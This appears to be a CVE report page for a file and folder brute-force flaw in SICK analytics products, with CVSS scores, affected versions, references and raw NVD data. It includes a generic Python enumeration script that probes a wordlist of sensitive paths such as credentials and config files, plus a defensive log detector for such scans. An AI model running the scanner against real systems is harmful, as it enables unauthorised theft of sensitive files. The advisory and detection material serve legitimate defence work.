Security Vulnerability Report
CVE-2025-58590 CVSS 6.5 MEDIUM

CVE-2025-58590

Published: 2025-10-06 07:15:36
Last Modified: 2026-01-27 19:44:57

Description

It's possible to brute force folders and files, which can be used by an attacker to steal sensitive information.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
NVD Score (Primary)
7.5 HIGH
NVD Vector (Primary)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')

The 6.5 MEDIUM score is the CNA's (secondary) assessment and assumes a low-privileged account is needed (PR:L). NVD's primary assessment in the raw record below uses the same vector except PR:N, i.e. reachable without authentication, which lifts the base score to 7.5 HIGH. Both vectors agree on the impact: confidentiality HIGH, no integrity or availability impact, scope unchanged. Until the vendor advisory settles whether authentication is required, use the higher NVD value for triage.

Configurations (Affected Products)

cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:* - VULNERABLE (versions up to and including 4.6.1)
cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:* - VULNERABLE (versions up to and including 4.6.1)
cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:* - VULNERABLE (versions up to and including 4.6.1)
cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:* - VULNERABLE (versions up to and including 4.6.1)
SICK products affected; for the exact models and version ranges, refer to the official SICK CSAF advisory sca-2025-0010.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The published description names no endpoint, so this PoC is a generic authenticated wordlist enumeration against the device's web root, not a reproduction of a specific traversal path; confirm the target's login flow and adjust the wordlist before running it.

```python
# CVE-2025-58590 - SICK Product Directory Enumeration PoC
# Description: Brute force folders and files to steal sensitive information
# Requirements: requests, low-privilege authentication credentials
#
# The login endpoint (/api/login), its JSON body and the wordlist are
# placeholders, not values taken from the SICK advisory; adapt them to the
# target's actual authentication flow.
import sys
from concurrent.futures import ThreadPoolExecutor

import requests
import urllib3

# The PoC deliberately skips TLS verification (verify=False); silence the
# per-request warning so that findings stay readable.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_URL = "https://target-sick-device.example.com"
USERNAME = "low_priv_user"
PASSWORD = "password123"
WORDLIST = [
    "admin", "config", "backup", "logs", "data", ".env", "config.php",
    "settings.xml", "users.db", "secret", "private", "internal", "api",
    "docs", "system", "debug", "test", "upload", "downloads", ".git/config",
    ".svn/entries", "web.config", "database.yml", "credentials.txt",
    "passwords.csv",
]


def check_path(session, base_url, path):
    """Request base_url/path and report it if the server answers 200 or 403."""
    url = f"{base_url}/{path}"
    try:
        response = session.get(url, timeout=5, verify=False)
    except requests.exceptions.RequestException:
        return None
    if response.status_code == 200:
        content_length = len(response.content)
        print(f"[+] FOUND: {url} (Status: {response.status_code}, Size: {content_length})")
        return (path, response.status_code, content_length)
    if response.status_code == 403:
        # 403 still confirms the path exists; only this account may not read it
        print(f"[!] FORBIDDEN (exists): {url}")
        return (path, response.status_code, 0)
    return None


def main():
    session = requests.Session()
    # Authenticate with low-privilege credentials (PR:L in the CNA's CVSS vector)
    login_url = f"{TARGET_URL}/api/login"
    auth_data = {"username": USERNAME, "password": PASSWORD}
    try:
        login = session.post(login_url, json=auth_data, timeout=10, verify=False)
        # a 401/403 from the login endpoint is a failure too, not only a transport error
        login.raise_for_status()
        print(f"[*] Authenticated to {TARGET_URL}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Authentication failed: {e}")
        sys.exit(1)

    print(f"[*] Starting directory enumeration on {TARGET_URL}")
    found_resources = []
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(check_path, session, TARGET_URL, path) for path in WORDLIST]
        for future in futures:
            result = future.result()
            if result:
                found_resources.append(result)

    print(f"\n[*] Enumeration complete. Found {len(found_resources)} accessible resources.")
    for resource in found_resources:
        print(f" -> {resource[0]}")


if __name__ == "__main__":
    main()
```
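The defender's side of the same behaviour, as an added example that is not part of the original PoC or of SICK's advisory: a wordlist walk like the one above leaves a burst of 403/404 responses for many different paths from one account, and that pattern is detectable in the web server's access log. The code parses Combined Log Format lines (an assumption; this page does not describe the log format of the SICK products) and flags any client/user pair that accumulates enough misses over enough distinct paths inside a sliding window. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log layout. Whether the affected SICK
# products log in this format is an assumption made for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one low-privileged account walks a wordlist
# (mostly 403/404 with a single hit) while a second account browses normally.
# One line is deliberately out of time order.
SAMPLE_LOG = """\
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:30 +0000] "GET /admin HTTP/1.1" 404 153
10.0.0.7 - operator [06/Oct/2025:07:15:30 +0000] "GET /dashboard HTTP/1.1" 200 5120
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:30 +0000] "GET /config HTTP/1.1" 404 153
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:31 +0000] "GET /backup HTTP/1.1" 404 153
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:31 +0000] "GET /logs HTTP/1.1" 403 199
10.0.0.7 - operator [06/Oct/2025:07:15:31 +0000] "GET /favicon.ico HTTP/1.1" 404 153
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:31 +0000] "GET /.env HTTP/1.1" 404 153
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:32 +0000] "GET /docs HTTP/1.1" 200 2048
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:32 +0000] "GET /.git/config HTTP/1.1" 404 153
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:32 +0000] "GET /web.config HTTP/1.1" 404 153
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:33 +0000] "GET /credentials.txt HTTP/1.1" 404 153
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:33 +0000] "GET /passwords.csv HTTP/1.1" 404 153
10.0.0.7 - operator [06/Oct/2025:07:15:40 +0000] "GET /dashboard/data HTTP/1.1" 200 8812
10.0.0.5 - low_priv_user [06/Oct/2025:07:15:33 +0000] "GET /users.db HTTP/1.1" 403 199
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def find_enumeration(lines, window=timedelta(seconds=60), min_misses=8, min_distinct=6):
    """Flag (ip, user) pairs that collect at least `min_misses` 403/404
    responses for at least `min_distinct` different paths inside any
    `window`-long span. Counting distinct paths keeps a client that
    reloads one missing page from firing the rule; a wordlist walk does."""
    misses = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["status"] in (403, 404):
            misses[(ev["ip"], ev["user"])].append((ev["ts"], ev["path"]))

    alerts = []
    for key, events in misses.items():
        events.sort()  # log order is not guaranteed to be time order
        for i, (start, _) in enumerate(events):
            span = [e for e in events[i:] if e[0] - start <= window]
            paths = {p for _, p in span}
            if len(span) >= min_misses and len(paths) >= min_distinct:
                alerts.append({
                    "ip": key[0], "user": key[1],
                    "first": span[0][0], "last": span[-1][0],
                    "misses": len(span), "distinct_paths": len(paths),
                    "sample_paths": sorted(paths)[:5],
                })
                break  # one alert per client is enough
    return alerts


if __name__ == "__main__":
    for alert in find_enumeration(SAMPLE_LOG.splitlines()):
        print(f"[ALERT] {alert['ip']} user={alert['user']}: {alert['misses']} misses over "
              f"{alert['distinct_paths']} paths between {alert['first']:%H:%M:%S} "
              f"and {alert['last']:%H:%M:%S}")
        print("        e.g.", ", ".join(alert["sample_paths"]))
```

On the sample log only 10.0.0.5/low_priv_user is flagged (10 misses over 10 paths in four seconds); the operator's single favicon 404 stays below threshold. Keying on the authenticated user as well as the source IP matters here because the CNA's vector assumes a low-privileged account, so the enumeration is attributable to a login, not just an address.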

References

https://sick.com/psirt - Vendor Advisory
https://www.cisa.gov/resources-tools/resources/ics-recommended-practices - US Government Resource
https://www.first.org/cvss/calculator/3.1 - Not Applicable
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json - Vendor Advisory (CSAF)
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf - Vendor Advisory (PDF)
https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf - Product (SICK cybersecurity operating guidelines)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-58590",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-06T07:15:35.873",
    "lastModified": "2026-01-27T19:44:57.473",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "It's possible to brute force folders and files, what can be used by an attacker to steal sensitve information."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "DC690872-9AF3-4159-8AFA-DD78816446A9"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "40EE515D-E8FD-490E-B0FF-9AABEC8488DA"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "A831A6C9-62EB-4E92-A300-1C37FA04E6C0"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "6BE16CA1-C2F5-44D5-974D-F98AD173DC61"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]},
      {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]},
      {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}
    ]
  }
}
```